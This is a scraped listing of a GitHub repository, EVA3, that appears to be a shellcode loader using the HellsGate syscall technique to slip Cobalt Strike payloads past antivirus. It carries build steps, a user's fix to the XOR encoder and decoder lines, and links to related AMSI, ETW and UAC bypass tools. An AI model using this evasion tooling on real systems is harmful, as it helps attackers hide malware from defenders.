EVA3: using hellsgate in EVA to get the syscalls [tested with cobalt strike 4.3]

EVA3: using hellsgate in EVA to get the syscalls [tested with cobalt strike 4.3]

 note that i dont claim that the idea is mine, this repo is probably just a
 fork but i wanted to show other ways of getting syscalls .

USAGE:

1- copy your x64 shellcode to encoder.py file

2- change the key if u want but remeber to change it in main.c file too

3- run encoder.py as following: python2 encoder.py

4- copy the generated shellcode to your 'shellcode' variable in main.c

5- compile using visual studio, as release x64

BASED ON:

i actually dont know if it can bypass some avs, but its a nice approach worth some attention, if u wanna add some other things like detecting debuggers / virtual envs, it will be a cool way to sharpen ur skills, u can view eva2 for some functions.

image

Owner
YOUR CODE IS ONLY LIMITED BY YOUR IMAGINATION
null
https://github.com/ORCA666/EVA3
Similar Resources

Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors".

Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as

COBALT STRIKE 4.4 Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as "adversary simulation software designed to exe

Aug 21, 2022

A Visual Studio template used to create Cobalt Strike BOFs

A Visual Studio template used to create Cobalt Strike BOFs

Introduction Cobalt Strike beacon object files (BOFs) is a feature that added to the beacon in order to allow rapid beacon extendibility in a more OPS

Dec 28, 2022

Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions

Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions

xPipe Cobalt Strike BOF (x64) Cobalt Strike Beacon Object File (BOF) to list active Pipes & return their Owner & Discretionary Access Control List (DA

Nov 9, 2022

Load and execute COFF files and Cobalt Strike BOFs in-memory

COFFLoader2 This repo contains the source code of a Common Object File Format (COFF) loader, which is a rewrite of the research and implementation don

Dec 22, 2022

BokuLoader - Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.

BokuLoader - Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.

BokuLoader - Cobalt Strike Reflective Loader Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities. B

Dec 31, 2022

This repository is meant to host the core files needed to create a Beacon Object File for use with Cobalt Strike

BOF Template This repository is meant to host the core files needed to create a Beacon Object File for use with Cobalt Strike. A Beacon Object File (B

Nov 9, 2022

Some extensions for windows explorer, tested on windows 10+

WindowsExplorerExtension Extensions for windows explorer, tested on windows 10 & windows 11. New Folder Extension What's This A Gnome nautilus inspire

Jan 13, 2022

Fluid Visualization - The code compilation is only tested on Arch Linux x86_64

Fluid Visualization The code compilation is only tested on Arch Linux x86_64, Linux kernel 5.15.13-arch1, with gcc 11.1.0, CMake 3.22.1, Xorg X server

Jan 30, 2022

EarlyBird: a poc of using the tech with syscalls on powershell.exe

EarlyBird: a poc of using the tech with syscalls on powershell.exe

EarlyBird: a poc of using the tech with syscalls on powershell.exe injecting cobalt strike shellcode to powershell.exe using EarlyBird Tech USAGE: fir

Jan 22, 2022
Comments
  • 2 changes to make it work

    2 changes to make it work

    First of all, great work. Very nice tool. Thank you a lot for sharing.

    I had to make 2 changes to make it work.

    1. encoder.py:

    If the XOR result is 0x03 for a certain byte you print 0x3 which doesn't work when you transfer the payload to main.cpp.

    Changing

    print("".join(["\\x{0}".format(hex(abs(i)).replace("0x", "")) for i in encoded_shellcode]))

    to

    print("".join(["\\x{:02x}".format(abs(i)) for i in encoded_shellcode]

    helped me.

    2. main.cpp

    I had to change line

    char DecodedOpCode = shellcode[i] ^ 69;

    to

    char DecodedOpCode = shellcode[i] ^ 105;

    Since in encoder.py we XOR with a hex value, and in main.cpp with a dec value.

    Update:

    Changing issue 1 is not necessary since after solving issue 2 I recognized that even bytes like \x3 work :-)

    I hope this will be helpful for the one or the other.

    Cheerz.

Related tags
Miscellaneous EVA3
Undetectable Loader for Cobalt Strike Using Syscalls And A External Shellcode

Hellsgate Undetectable Loader for Cobalt Strike Using Syscalls And A External Shellcode Features: Using Syscalls from Hellsgate tech loading the shell

Nov 5, 2021
Cobalt Strike BOF that uses a custom ASM HalosGate & HellsGate syscaller to return a list of processes
 Cobalt Strike BOF that uses a custom ASM HalosGate & HellsGate syscaller to return a list of processes

HalosGate Processlist Cobalt Strike BOF Cobalt Strike Beacon Object File (BOF) that uses a custom HalosGate & HellsGate syscaller, written in assembly

Nov 9, 2022
CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)
 CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)

Cobalt Strike BOF - Inject ETW Bypass Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate) Running InjectEtwBypass BOF from Cobalt

Dec 9, 2022
Cobalt Strike Beacon Object File (BOF) that takes the name of of a PE file as an argument and spawns the process in a suspended state
 Cobalt Strike Beacon Object File (BOF) that takes the name of of a PE file as an argument and spawns the process in a suspended state

Beacon Object File (BOF) that spawns an arbitrary process from beacons memory. Supports Parent Process ID (PPID) spoofing & blocking non-MS signed DLLs from loading into the processes memory (some EDR DLLs).

Dec 1, 2022
Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.
 Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.

Cobalt Strike BOF - Inject AMSI Bypass Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection. Running inje

Dec 28, 2022
Free,Open-Source,Cross-platform agent and Post-exploiton tool written in Golang and C++, the architecture and usage like Cobalt Strike
 Free,Open-Source,Cross-platform agent and Post-exploiton tool written in Golang and C++, the architecture and usage like Cobalt Strike

Khepri Free,Open-Source,Cross-platform agent and Post-exploiton tool written in Golang and C++ Description Khepri is a Cross-platform agent, the archi

Jan 3, 2023
Collection of BOFs for Cobalt Strike

Collection of BOFs for Cobalt Strike

Jul 27, 2022
Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.
 Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.

Cobalt Strike "Where Am I?" Beacon Object File Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environmen

Nov 30, 2022
Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.
 Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.

Cobalt Strike User-Defined Reflective Loader Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities. B

Jan 3, 2023
Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving
Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving

Beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving "cmd.exe" by using DCOM object.

Dec 28, 2022